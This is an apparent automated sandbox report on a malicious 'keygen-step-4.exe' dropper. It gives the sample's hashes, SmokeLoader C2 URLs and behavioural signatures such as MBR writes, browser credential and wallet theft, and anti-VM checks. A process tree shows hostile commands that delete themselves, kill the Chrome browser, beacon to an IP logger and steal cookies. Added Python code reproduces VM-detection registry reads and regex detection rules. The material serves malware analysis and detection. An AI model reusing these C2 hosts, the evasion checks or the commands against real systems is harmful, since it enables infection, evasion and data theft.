
Resubmissions

13/02/2021, 11:21

210213-7tzhc75v52 10

13/02/2021, 11:08

210213-tgl7w9bhm2 10

Analysis

  • max time kernel
    151s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    13/02/2021, 11:08

General

  • Target

    keygen-step-4.exe

  • Size

    6.8MB

  • MD5

    38f1d6ddf7e39767157acbb107e03250

  • SHA1

    dcb0d5feacb80c1e4cbb71a30cff7edf10a185e8

  • SHA256

    97ada84ef77a3b45abd2e14caf519e06bbbad5a6ed180aa6ee543e38e9bce796

  • SHA512

    3ba909b5001a3b995ebe8f9dbd4ddb6506a5c66612cf43e94a50f72c543a9aa4828bbba224db807de10076c5e70fabf7cc31bf8e442a3f4cf26d95c7f7094c2d

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://naritouzina.net/

http://nukaraguasleep.net/

http://notfortuaj.net/

http://natuturalistic.net/

http://zaniolofusa.net/

rc4.i32
rc4.i32

Signatures

  • PlugX

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Executes dropped EXE 22 IoCs
  • Suspicious Office macro 1 IoCs

    Office document equipped with 4.0 macros.

  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Loads dropped DLL 62 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • themida 2 IoCs

    Detects Themida, Advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Writes to the Master Boot Record (MBR) 1 TTPs 4 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 48 IoCs
  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 36 IoCs
  • Modifies data under HKEY_USERS 1 IoCs
  • Modifies system certificate store 2 TTPs 13 IoCs
  • Runs ping.exe 1 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
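
The BIOS, SCSI, processor and VirtualBox-ACPI signatures above all describe one trick: the sample reads hardware descriptions out of HKLM and bails out if they name a hypervisor. The following is an added example, not code from this report, from tria.ge or from the sample, that reproduces those reads so a sandbox operator can check whether a hardened image still leaks the markers. The registry paths are the real HKLM locations these checks use; the marker word list and the two registry snapshots are constructed for illustration and are assumptions of this example.

```python
"""Reproduces the registry reads behind the 'Checks BIOS information',
'Checks SCSI registry key(s)', 'Checks processor information' and
'Identifies VirtualBox via ACPI registry values' signatures.
vm_indicators() is a pure function over a {key: {value: data}} snapshot so
it runs anywhere; read_live_snapshot() fills that shape from HKLM on Windows."""
import re
import sys

SCSI_LUN0 = r"HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0"

# Real HKLM locations read by this family of checks: (key, value name).
VALUE_CHECKS = [
    (r"HARDWARE\DESCRIPTION\System\BIOS", "SystemManufacturer"),
    (r"HARDWARE\DESCRIPTION\System\BIOS", "SystemProductName"),
    (r"HARDWARE\DESCRIPTION\System\BIOS", "BIOSVendor"),
    (SCSI_LUN0, "Identifier"),
    (r"HARDWARE\DESCRIPTION\System\CentralProcessor\0", "ProcessorNameString"),
]
# ACPI table keys whose OEM-ID subkey only exists inside a VirtualBox guest.
KEY_CHECKS = [
    r"HARDWARE\ACPI\DSDT\VBOX__",
    r"HARDWARE\ACPI\FADT\VBOX__",
    r"HARDWARE\ACPI\RSDT\VBOX__",
]
# Assumption: an illustrative hypervisor marker list, not the sandbox's exact logic.
VM_MARKERS = re.compile(r"vbox|virtualbox|innotek|vmware|qemu|bochs|xen|kvm|virtual", re.I)


def vm_indicators(snapshot):
    """Return (key, value_name, data) for every leak; an empty list means 'looks physical'."""
    hits = []
    for key, name in VALUE_CHECKS:
        data = snapshot.get(key, {}).get(name)
        if data is not None and VM_MARKERS.search(str(data)):
            hits.append((key, name, data))
    for key in KEY_CHECKS:
        if key in snapshot:  # presence alone is the tell
            hits.append((key, None, "<key present>"))
    return hits


def read_live_snapshot():
    """Windows-only: build the same snapshot shape from the real HKLM hive."""
    if sys.platform != "win32":
        raise RuntimeError("live registry read requires Windows")
    import winreg  # stdlib on Windows
    snap = {}
    for key, name in VALUE_CHECKS:
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, key) as h:
                snap.setdefault(key, {})[name] = winreg.QueryValueEx(h, name)[0]
        except OSError:
            pass  # key or value absent on this build
    for key in KEY_CHECKS:
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, key):
                snap[key] = {}
        except OSError:
            pass
    return snap


# Constructed snapshots for illustration (not captured from the analysed machine).
VBOX_GUEST = {
    r"HARDWARE\DESCRIPTION\System\BIOS": {
        "SystemManufacturer": "innotek GmbH",
        "SystemProductName": "VirtualBox",
        "BIOSVendor": "innotek GmbH",
    },
    SCSI_LUN0: {"Identifier": "VBOX HARDDISK"},
    r"HARDWARE\DESCRIPTION\System\CentralProcessor\0": {
        "ProcessorNameString": "Intel(R) Core(TM) i7-8700 CPU @ 3.20GHz",
    },
    r"HARDWARE\ACPI\DSDT\VBOX__": {},
}
PHYSICAL_HOST = {
    r"HARDWARE\DESCRIPTION\System\BIOS": {
        "SystemManufacturer": "Dell Inc.",
        "SystemProductName": "OptiPlex 7070",
        "BIOSVendor": "Dell Inc.",
    },
    SCSI_LUN0: {"Identifier": "SAMSUNG MZVLB512HBJQ-000L7"},
    r"HARDWARE\DESCRIPTION\System\CentralProcessor\0": {
        "ProcessorNameString": "Intel(R) Core(TM) i7-8700 CPU @ 3.20GHz",
    },
}

if __name__ == "__main__":
    snap = read_live_snapshot() if sys.platform == "win32" else VBOX_GUEST
    for key, name, data in vm_indicators(snap):
        print(f"LEAK  {key}  {name or ''}  {data}")
```

Run it inside the analysis VM: every line it prints is a value the sample can read with a plain RegQueryValueEx, so each one is a candidate for patching in the image (SMBIOS strings and the virtual disk's SCSI identifier are the usual offenders; the ACPI OEM-ID keys need the hypervisor's ACPI tables changed, not just the registry).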

Processes

  • C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
    "C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:296
    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Writes to the Master Boot Record (MBR)
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Modifies system certificate store
      • Suspicious use of WriteProcessMemory
      PID:1976
      • C:\Windows\SysWOW64\msiexec.exe
        msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
        3⤵
        • Enumerates connected drives
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        PID:904
      • C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe
        C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe 0011 installp1
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Writes to the Master Boot Record (MBR)
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:1940
        • C:\Program Files\Mozilla Firefox\firefox.exe
          "C:\Program Files\Mozilla Firefox\firefox.exe"
          4⤵
          PID:1516
        • C:\Program Files\Mozilla Firefox\firefox.exe
          "C:\Program Files\Mozilla Firefox\firefox.exe"
          4⤵
          PID:932
        • C:\Program Files\Mozilla Firefox\firefox.exe
          "C:\Program Files\Mozilla Firefox\firefox.exe"
          4⤵
          PID:1568
        • C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe
          C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"
          4⤵
          • Executes dropped EXE
          PID:2852
        • C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe
          "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Writes to the Master Boot Record (MBR)
          PID:2916
        • C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe
          C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe /silent
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:3052
          • C:\Users\Admin\AppData\Local\Temp\is-BGMJT.tmp\23E04C4F32EF2158.tmp
            "C:\Users\Admin\AppData\Local\Temp\is-BGMJT.tmp\23E04C4F32EF2158.tmp" /SL5="$6019A,815708,121344,C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe" /silent
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Drops file in Program Files directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of FindShellTrayWindow
            PID:3068
            • C:\Program Files (x86)\HappyNewYear\seed.sfx.exe
              "C:\Program Files (x86)\HappyNewYear\seed.sfx.exe" -pX7mdks39WE0 -s1
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Drops file in Program Files directory
              PID:1536
              • C:\Program Files (x86)\Seed Trade\Seed\seed.exe
                "C:\Program Files (x86)\Seed Trade\Seed\seed.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks SCSI registry key(s)
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious behavior: MapViewOfSection
                PID:2248
            • C:\Windows\SysWOW64\cmd.exe
              "cmd.exe" /c "start https://iplogger.org/14Zhe7"
              6⤵
              PID:1200
              • C:\Program Files\Internet Explorer\iexplore.exe
                "C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/14Zhe7
                7⤵
                • Modifies Internet Explorer settings
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SetWindowsHookEx
                PID:1408
                • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1408 CREDAT:275457 /prefetch:2
                  8⤵
                  • Modifies Internet Explorer settings
                  • Suspicious use of SetWindowsHookEx
                  PID:2120
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe"
          4⤵
          PID:1632
          • C:\Windows\SysWOW64\PING.EXE
            ping 127.0.0.1 -n 3
            5⤵
            • Runs ping.exe
            PID:2512
      • C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe
        C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe 200 installp1
        3⤵
        • Executes dropped EXE
        • Writes to the Master Boot Record (MBR)
        • Suspicious use of WriteProcessMemory
        PID:1416
        • C:\Windows\SysWOW64\cmd.exe
          cmd.exe /c taskkill /f /im chrome.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:436
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /f /im chrome.exe
            5⤵
            • Kills process with taskkill
            PID:1068
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe"
          4⤵
          PID:1760
          • C:\Windows\SysWOW64\PING.EXE
            ping 127.0.0.1 -n 3
            5⤵
            • Runs ping.exe
            PID:1344
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:344
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 3
          4⤵
          • Runs ping.exe
          PID:680
    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\md2_2efs.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\md2_2efs.exe"
      2⤵
      • Executes dropped EXE
      • Modifies system certificate store
      PID:652
    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Modifies data under HKEY_USERS
      • Modifies system certificate store
      • Suspicious behavior: EnumeratesProcesses
      PID:1464
      • C:\Users\Admin\AppData\Roaming\6BB0.tmp.exe
        "C:\Users\Admin\AppData\Roaming\6BB0.tmp.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        PID:436
        • C:\Users\Admin\AppData\Roaming\6BB0.tmp.exe
          "C:\Users\Admin\AppData\Roaming\6BB0.tmp.exe"
          4⤵
          • Executes dropped EXE
          • Checks processor information in registry
          • Suspicious behavior: EnumeratesProcesses
          PID:1576
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe"
        3⤵
        PID:2072
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1
          4⤵
          • Runs ping.exe
          PID:2136
    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\BTRSetp.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\BTRSetp.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      PID:2104
      • C:\Users\Admin\AppData\Local\Temp\RarSFX1\installer.exe
        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\installer.exe"
        3⤵
        • Executes dropped EXE
        PID:2196
        • C:\ProgramData\1955041.21
          "C:\ProgramData\1955041.21"
          4⤵
          • Executes dropped EXE
          PID:2308
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2308 -s 516
            5⤵
            • Loads dropped DLL
            • Program crash
            • Suspicious behavior: EnumeratesProcesses
            PID:2580
        • C:\ProgramData\6437690.70
          "C:\ProgramData\6437690.70"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Adds Run key to start application
          PID:2336
          • C:\ProgramData\Windows Host\Windows Host.exe
            "C:\ProgramData\Windows Host\Windows Host.exe"
            5⤵
            • Executes dropped EXE
            PID:2708
        • C:\ProgramData\894661.9
          "C:\ProgramData\894661.9"
          4⤵
          • Executes dropped EXE
          • Checks BIOS information in registry
          • Checks whether UAC is enabled
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Modifies system certificate store
          • Suspicious behavior: EnumeratesProcesses
          PID:2372
    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gdrrr.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gdrrr.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Adds Run key to start application
      PID:2420
      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        3⤵
        • Executes dropped EXE
        PID:2488
      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        PID:2808
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:472
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding E91876D95E53DF5438225681C4D01531 C
      2⤵
      • Loads dropped DLL
      PID:572
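
The tree above shows several shell-level patterns worth alerting on from process-creation telemetry: the cmd /c ping 127.0.0.1 ... & del chains that delay and then delete the dropper (PIDs 1632, 1760, 344, 2072), the taskkill /f /im chrome.exe browser kill ahead of the stealer stage, the iplogger.org beacon opened through start, and msiexec /i installing a package straight out of the user's Temp directory. The following is an added example, not part of the original report, of detection logic over such command lines; the sample lines are copied from the process tree above, while the rule names, regular expressions and browser list are this example's own assumptions, not tria.ge's signature logic.

```python
"""Flags the shell-level tradecraft visible in the process tree: delayed
self-deletion (ping as a sleep, then del), killing a browser before stealing
its data, beaconing to an IP logger via 'start', and msiexec installing from
the user's Temp directory.  Input is (pid, command line) pairs, the shape
Sysmon event 1 or Security event 4688 gives you."""
import re

# Assumption: rule names, patterns and the browser list are this example's own,
# chosen to match the lines in this report; they are not tria.ge's signatures.
RULES = [
    ("self-delete via ping delay",
     re.compile(r'\bping\s+127\.0\.0\.1\b.*?&&?\s*del\s+"?[^"]+\.exe', re.I)),
    ("kills browser with taskkill",
     re.compile(r'\btaskkill\b.*?/im\s+(?:chrome|firefox|iexplore|msedge)\.exe', re.I)),
    ("ip-logger beacon via shell start",
     re.compile(r'\bstart\s+https?://(?:www\.)?iplogger\.org/', re.I)),
    ("msiexec install from user temp",
     re.compile(r'msiexec(?:\.exe)?\s+/i\s+"?[a-z]:\\Users\\[^"]*?\\AppData\\Local\\Temp\\', re.I)),
]


def match_rules(pid, cmdline):
    """All rules that fire for one process, as (pid, rule name) pairs."""
    return [(pid, name) for name, pat in RULES if pat.search(cmdline)]


def scan(processes):
    """processes: iterable of (pid, cmdline). Returns hits in input order."""
    hits = []
    for pid, cmdline in processes:
        hits.extend(match_rules(pid, cmdline))
    return hits


# Command lines copied from the process tree in this report (PIDs as shown there).
SAMPLE = [
    (296, r'"C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"'),
    (904, r'msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"'),
    (1200, r'"cmd.exe" /c "start https://iplogger.org/14Zhe7"'),
    (1632, r'cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe"'),
    (436, r'cmd.exe /c taskkill /f /im chrome.exe'),
    (2072, r'"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe"'),
    (2512, r'ping 127.0.0.1 -n 3'),  # the child ping alone is benign; the parent cmd line is the signal
    (2248, r'"C:\Program Files (x86)\Seed Trade\Seed\seed.exe"'),
]

if __name__ == "__main__":
    for pid, rule in scan(SAMPLE):
        print(f"PID {pid:>5}  {rule}")
```

The self-deletion rule keys on the parent cmd.exe line rather than on PING.EXE, because ping 127.0.0.1 by itself is everyday noise; it is the ping-then-del pairing that identifies the pattern. Feed scan() the full command line of each process-creation event, not the image name.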

Downloads

  • memory/296-2-0x0000000076381000-0x0000000076383000-memory.dmp
    Filesize: 8KB
  • memory/436-69-0x0000000000840000-0x0000000000851000-memory.dmp
    Filesize: 68KB
  • memory/436-76-0x0000000000220000-0x0000000000265000-memory.dmp
    Filesize: 276KB
  • memory/472-15-0x000007FEFC0A1000-0x000007FEFC0A3000-memory.dmp
    Filesize: 8KB
  • memory/652-39-0x0000000073AE0000-0x0000000073C83000-memory.dmp
    Filesize: 1.6MB
  • memory/932-63-0x0000000000060000-0x0000000000061000-memory.dmp
    Filesize: 4KB
  • memory/1244-187-0x0000000002D90000-0x0000000002DA6000-memory.dmp
    Filesize: 88KB
  • memory/1416-43-0x0000000003690000-0x0000000003B3F000-memory.dmp
    Filesize: 4.7MB
  • memory/1464-55-0x0000000000020000-0x000000000002D000-memory.dmp
    Filesize: 52KB
  • memory/1464-68-0x00000000028A0000-0x00000000028EC000-memory.dmp
    Filesize: 304KB
  • memory/1516-49-0x0000000000060000-0x0000000000061000-memory.dmp
    Filesize: 4KB
  • memory/1516-45-0x0000000010000000-0x0000000010057000-memory.dmp
    Filesize: 348KB
  • memory/1536-174-0x0000000002260000-0x0000000002361000-memory.dmp
    Filesize: 1.0MB
  • memory/1576-71-0x0000000000400000-0x0000000000448000-memory.dmp
    Filesize: 288KB
  • memory/1576-79-0x0000000000400000-0x0000000000448000-memory.dmp
    Filesize: 288KB
  • memory/1940-42-0x00000000033F0000-0x000000000389F000-memory.dmp
    Filesize: 4.7MB
  • memory/1976-11-0x0000000010000000-0x000000001033D000-memory.dmp
    Filesize: 3.2MB
  • memory/1976-48-0x000007FEF6580000-0x000007FEF67FA000-memory.dmp
    Filesize: 2.5MB
  • memory/2104-89-0x0000000001010000-0x0000000001011000-memory.dmp
    Filesize: 4KB
  • memory/2196-100-0x0000000000B60000-0x0000000000B61000-memory.dmp
    Filesize: 4KB
  • memory/2196-104-0x0000000000160000-0x0000000000161000-memory.dmp
    Filesize: 4KB
  • memory/2196-102-0x0000000000130000-0x0000000000131000-memory.dmp
    Filesize: 4KB
  • memory/2196-99-0x000007FEF5410000-0x000007FEF5DFC000-memory.dmp
    Filesize: 9.9MB
  • memory/2196-103-0x0000000000140000-0x000000000015E000-memory.dmp
    Filesize: 120KB
  • memory/2196-113-0x000000001AF10000-0x000000001AF12000-memory.dmp
    Filesize: 8KB
  • memory/2248-180-0x00000000051B0000-0x00000000051C1000-memory.dmp
    Filesize: 68KB
  • memory/2248-182-0x0000000000020000-0x000000000002A000-memory.dmp
    Filesize: 40KB
  • memory/2248-183-0x0000000000030000-0x000000000003A000-memory.dmp
    Filesize: 40KB
  • memory/2248-184-0x0000000000400000-0x000000000040A000-memory.dmp
    Filesize: 40KB
  • memory/2308-108-0x00000000733A0000-0x0000000073A8E000-memory.dmp
    Filesize: 6.9MB
  • memory/2308-132-0x0000000000C40000-0x0000000000C41000-memory.dmp
    Filesize: 4KB
  • memory/2336-112-0x00000000733A0000-0x0000000073A8E000-memory.dmp
    Filesize: 6.9MB
  • memory/2336-148-0x0000000000670000-0x0000000000671000-memory.dmp
    Filesize: 4KB
  • memory/2336-146-0x0000000000330000-0x000000000033B000-memory.dmp
    Filesize: 44KB
  • memory/2336-135-0x0000000000350000-0x0000000000351000-memory.dmp
    Filesize: 4KB
  • memory/2372-147-0x0000000000920000-0x0000000000921000-memory.dmp
    Filesize: 4KB
  • memory/2372-133-0x00000000009A0000-0x00000000009A1000-memory.dmp
    Filesize: 4KB
  • memory/2372-127-0x00000000733A0000-0x0000000073A8E000-memory.dmp
    Filesize: 6.9MB
  • memory/2580-155-0x0000000001B90000-0x0000000001B91000-memory.dmp
    Filesize: 4KB
  • memory/2580-140-0x0000000001CC0000-0x0000000001CD1000-memory.dmp
    Filesize: 68KB
  • memory/2708-152-0x0000000000BB0000-0x0000000000BB1000-memory.dmp
    Filesize: 4KB
  • memory/2708-156-0x0000000004930000-0x0000000004931000-memory.dmp
    Filesize: 4KB
  • memory/2708-151-0x00000000733A0000-0x0000000073A8E000-memory.dmp
    Filesize: 6.9MB
  • memory/2916-169-0x000000000C790000-0x000000000C791000-memory.dmp
    Filesize: 4KB
  • memory/3052-167-0x0000000000401000-0x000000000040C000-memory.dmp
    Filesize: 44KB
  • memory/3068-168-0x0000000000240000-0x0000000000241000-memory.dmp
    Filesize: 4KB
  • memory/3068-166-0x0000000070731000-0x0000000070733000-memory.dmp
    Filesize: 8KB